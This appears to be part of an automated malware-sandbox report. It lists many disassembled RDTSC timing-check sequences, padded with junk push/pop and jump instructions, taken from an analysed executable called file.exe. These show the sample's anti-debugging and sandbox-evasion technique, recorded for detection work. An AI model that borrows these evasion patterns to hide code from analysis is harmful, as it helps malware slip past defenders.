                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5AFF1 second address: F5B00F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F400072A731h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B58F second address: F5B5A0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B5A0 second address: F5B5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C6CD second address: F5C6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D598 second address: F5D5A2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D5A2 second address: F5D5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B85B second address: F5B85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5D5A9 second address: F5D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jl 00007F4000E20B74h 0x0000000e pushad 0x0000000f jnp 00007F4000E20B66h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B85F second address: F5B863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B863 second address: F5B869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F623 second address: F5F6B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F400072A726h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F400072A728h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov dword ptr [ebp+12454104h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F400072A728h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d call 00007F400072A72Ch 0x00000052 movzx edi, dx 0x00000055 pop ebx 0x00000056 push 00000000h 0x00000058 jmp 00007F400072A738h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 pushad 0x00000062 popad 0x00000063 ja 00007F400072A726h 0x00000069 popad 0x0000006a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5E860 second address: F5E867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F6B1 second address: F5F6B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616BA second address: F616C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F7F1 second address: F5F7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616C4 second address: F616CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F7F5 second address: F5F7FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616CA second address: F616D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616D0 second address: F616D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F8A8 second address: F5F8B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616D6 second address: F616DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F616DA second address: F61706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4000E20B70h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 jng 00007F4000E20B6Eh 0x00000019 jp 00007F4000E20B66h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61706 second address: F61711 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F400072A726h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61711 second address: F6171A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6171A second address: F61724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F400072A726h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63C88 second address: F63CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63CA2 second address: F63CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63CA6 second address: F63CB0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63DFE second address: F63E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66D3F second address: F66D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69C5B second address: F69C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65D7C second address: F65D8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F4000E20B66h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65D8E second address: F65D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65D92 second address: F65D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65D98 second address: F65D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65D9E second address: F65DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65DA2 second address: F65E06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2A2Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push ebx 0x0000001b mov bx, cx 0x0000001e pop ebx 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov ebx, 5B1008ADh 0x0000002b mov eax, dword ptr [ebp+122D1121h] 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F400072A728h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b push FFFFFFFFh 0x0000004d movzx edi, di 0x00000050 mov dword ptr [ebp+122D2560h], ecx 0x00000056 nop 0x00000057 jc 00007F400072A730h 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F67F03 second address: F67F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BC25 second address: F6BC2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BC2B second address: F6BC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64D28 second address: F64D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64D2C second address: F64DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4000E20B76h 0x0000000f nop 0x00000010 add di, BD71h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F4000E20B68h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 clc 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+12454194h], esi 0x00000044 mov eax, dword ptr [ebp+122D12CDh] 0x0000004a mov dword ptr [ebp+122D3C79h], esi 0x00000050 push FFFFFFFFh 0x00000052 jg 00007F4000E20B6Ch 0x00000058 mov dword ptr [ebp+122D3C1Dh], ebx 0x0000005e nop 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F4000E20B76h 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64DD2 second address: F64DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69DE7 second address: F69E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F4000E20B66h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64DD6 second address: F64DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F400072A733h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F400072A72Ch 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69E06 second address: F69E10 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ADD1 second address: F6ADD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ADD6 second address: F6ADE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4000E20B6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ADE4 second address: F6AE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A72Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F400072A72Ch 0x00000014 jng 00007F400072A726h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BE8D second address: F6BE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BE95 second address: F6BE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70A51 second address: F70A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F4000E20B66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F015 second address: F0F036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F400072A733h 0x0000000a popad 0x0000000b push ebx 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0F036 second address: F0F04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B70h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74F59 second address: F74F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7491A second address: F74937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Fh 0x00000007 jng 00007F4000E20B66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74937 second address: F7493B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7493B second address: F74945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74AF6 second address: F74B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A72Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79A31 second address: F79A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4000E20B70h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79A4A second address: F79A77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d jg 00007F400072A728h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F400072A72Fh 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79B37 second address: F79B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79B3D second address: F79B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F79B46 second address: F79B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E2B6 second address: F7E2DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400072A737h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F400072A726h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E42F second address: F7E44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jns 00007F4000E20B66h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F4000E20B6Ch 0x00000017 jns 00007F4000E20B66h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E870 second address: F7E874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E9E8 second address: F7EA0C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4000E20B72h 0x00000008 pushad 0x00000009 jmp 00007F4000E20B6Bh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EB6C second address: F7EB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EB71 second address: F7EB8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B76h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EB8C second address: F7EBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A735h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87014 second address: F8701A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8701A second address: F8701E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D6D second address: F85D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86039 second address: F8603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8603D second address: F8606D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4000E20B66h 0x00000008 jmp 00007F4000E20B6Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4000E20B78h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F862DC second address: F862E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86481 second address: F8649E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F4000E20B75h 0x0000000c pop ebx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8649E second address: F864A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F864A3 second address: F864B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F558B0 second address: F558B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F558B7 second address: F558C1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4000E20B6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55C3E second address: F55C4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F400072A726h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55E7B second address: F55E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F4000E20B6Fh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56014 second address: F56018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F567FD second address: F56808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4000E20B66h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56808 second address: F56812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F400072A726h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56986 second address: F5698B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5698B second address: F5699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5699B second address: F569A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F569A2 second address: F569CB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400072A728h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jne 00007F400072A72Eh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F400072A726h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56AAC second address: F56AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56AB0 second address: F56AB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
